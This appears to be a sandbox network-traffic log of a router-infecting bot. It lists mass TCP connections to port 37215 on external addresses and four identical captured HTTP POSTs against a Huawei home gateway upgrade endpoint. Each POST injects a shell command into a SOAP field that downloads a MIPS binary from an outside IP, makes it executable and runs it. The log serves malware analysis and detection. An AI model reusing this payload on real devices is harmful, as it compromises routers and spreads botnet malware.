Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.239.89.252:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 121.149.7.64:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 89.82.155.117:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.51.120.69:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.38.204.127:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.65.49.171:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.21.222.63:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.30.204.11:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.143.103.170:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.138.219.142:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.227.187.70:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.134.42.217:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.234.145.88:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.91.42.74:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 61.207.59.153:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.124.159.174:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.248.33.3:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 116.52.96.35:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 118.239.70.36:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.207.159.198:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.62.212.75:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.207.118.58:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.136.182.8:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.184.252.224:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 103.107.205.206:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.43.204.163:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.32.81.132:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.186.38.211:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.66.77.84:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.206.224.157:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.98.164.254:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 209.250.221.144:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 38.153.238.181:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.245.22.138:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.208.108.23:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 165.14.24.77:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.55.126.175:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.215.22.33:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.140.152.130:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.90.47.75:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.176.91.214:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.160.175.6:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.156.124.24:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.72.17.112:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.174.227.61:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.131.75.51:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 151.243.204.255:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.87.218.35:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 201.56.239.118:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 163.50.246.68:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.254.137.178:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.96.27.126:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 39.230.40.124:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.203.175.23:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 57.66.132.137:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.172.135.138:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.49.79.100:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 135.65.150.114:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.227.131.179:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.98.61.135:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.101.51.82:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.34.138.147:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.19.104.45:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 161.153.181.4:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.179.46.183:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.38.150.197:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.107.183.107:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.20.243.114:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.155.161.202:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 113.202.251.105:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 142.203.126.24:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.84.133.217:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.164.181.243:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.59.31.213:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.132.84.213:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 133.206.46.108:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.228.57.190:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 147.98.189.95:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.193.31.87:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.36.13.131:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.8.220.149:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.10.58.66:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.13.5.37:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.72.35.124:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.160.74.43:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.10.157.32:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.93.81.75:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.143.30.79:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.99.82.0:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 168.99.141.244:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.61.211.126:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.20.152.107:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.179.197.187:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.1.53.173:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.123.158.137:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.181.138.110:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 148.231.112.157:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.26.90.225:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.171.206.114:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.140.191.195:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.125.61.207:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.96.172.72:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 66.96.185.168:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.152.67.197:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.17.101.75:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.227.166.113:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.104.150.99:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.62.33.158:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.160.207.112:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.184.181.252:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 40.158.28.226:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.182.7.228:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.116.30.57:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.11.61.230:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.221.160.190:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.148.218.138:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.92.177.5:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 206.103.152.185:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.52.36.238:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 78.13.123.193:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.69.57.0:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.124.128.156:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 170.230.59.16:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 167.3.206.78:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.180.205.90:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.166.108.179:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.112.55.148:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.210.73.23:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.70.192.127:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.135.112.49:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.193.113.175:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.64.10.227:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.183.1.153:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.169.175.41:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 2.79.205.105:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.75.75.39:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.214.18.79:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 164.30.196.203:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.102.235.35:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 97.222.88.148:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.176.156.36:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.103.48.195:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.64.173.128:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.226.220.221:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.105.154.131:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.137.127.28:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.122.61.176:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.48.192.28:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 57.118.171.76:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.197.117.88:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 97.98.192.103:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 109.10.120.11:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.67.154.127:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 37.28.220.200:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.101.148.213:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 183.110.184.249:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.45.109.125:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.46.128.49:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.184.94.235:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.91.128.245:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.57.112.73:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.114.41.153:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.86.203.191:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 1.254.232.160:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.24.150.199:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 111.45.225.15:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.236.221.92:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 186.133.60.126:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.228.9.131:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.168.116.247:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 90.17.37.174:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.254.249.232:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.149.79.16:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.62.55.175:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.101.86.71:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.135.16.217:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.14.37.245:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 213.58.141.56:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.63.42.164:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 54.61.253.67:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.205.98.121:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.229.254.31:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.18.196.137:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 37.31.74.24:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.251.123.166:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.138.143.131:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.190.201.139:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 81.25.210.213:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.51.204.31:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 223.74.55.57:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.250.52.5:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 84.16.30.15:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.34.114.26:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.212.68.204:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.154.101.240:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.33.25.53:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.42.111.199:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.95.89.142:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.63.182.68:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.129.147.193:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.245.176.122:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.35.72.0:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.97.77.185:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 137.239.129.236:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.203.23.119:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.213.71.156:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.193.126.226:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.243.161.206:37215

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 460Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 37 30 2e 31 34 39 2e 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 3b 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.70.149.14 -l /tmp/.rebirth -r /mips; /bin/busybox chmod 777 /tmp/.rebirth; /tmp/.rebirth huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 460Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 37 30 2e 31 34 39 2e 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 3b 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.70.149.14 -l /tmp/.rebirth -r /mips; /bin/busybox chmod 777 /tmp/.rebirth; /tmp/.rebirth huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 460Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 37 30 2e 31 34 39 2e 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 3b 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.70.149.14 -l /tmp/.rebirth -r /mips; /bin/busybox chmod 777 /tmp/.rebirth; /tmp/.rebirth huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 460Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 37 30 2e 31 34 39 2e 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 3b 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.70.149.14 -l /tmp/.rebirth -r /mips; /bin/busybox chmod 777 /tmp/.rebirth; /tmp/.rebirth huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
